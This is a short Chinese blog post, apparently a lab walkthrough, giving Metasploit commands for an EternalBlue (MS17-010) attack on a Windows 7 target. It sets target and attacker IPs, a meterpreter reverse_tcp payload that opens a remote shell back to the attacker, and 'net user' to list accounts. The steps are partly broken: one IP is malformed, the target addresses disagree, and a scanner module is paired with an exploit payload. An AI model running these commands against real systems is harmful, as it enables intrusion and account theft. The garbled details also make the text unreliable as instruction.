#
use auxiliary/scanner/smb/smb_ms17_010
# 设置靶机ip
set rhosts 192.1683.139.140
# 设置攻击主机ip地址
set lhosts 192.168.139.153
# —设置反弹到本机
set payload windows/x64/meterpreter/reverse_tcp
# 开始攻击
run
4.show options查看这个模块的选项,在Required列中,yes的是必填项,no是选填的,要手动设置RHOSTS的参数,指定的主机ip,我们设置成靶机(windows7)的ip地址:192.168.1.101
查看漏洞的条件
show targets
获取密码
net user
参考
https://blog.csdn.net/qq_37340973/article/details/109642113
文档信息
- 本文作者:dzxindex
- 本文链接:https://dzxindex.github.io/2022/02/16/security-%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)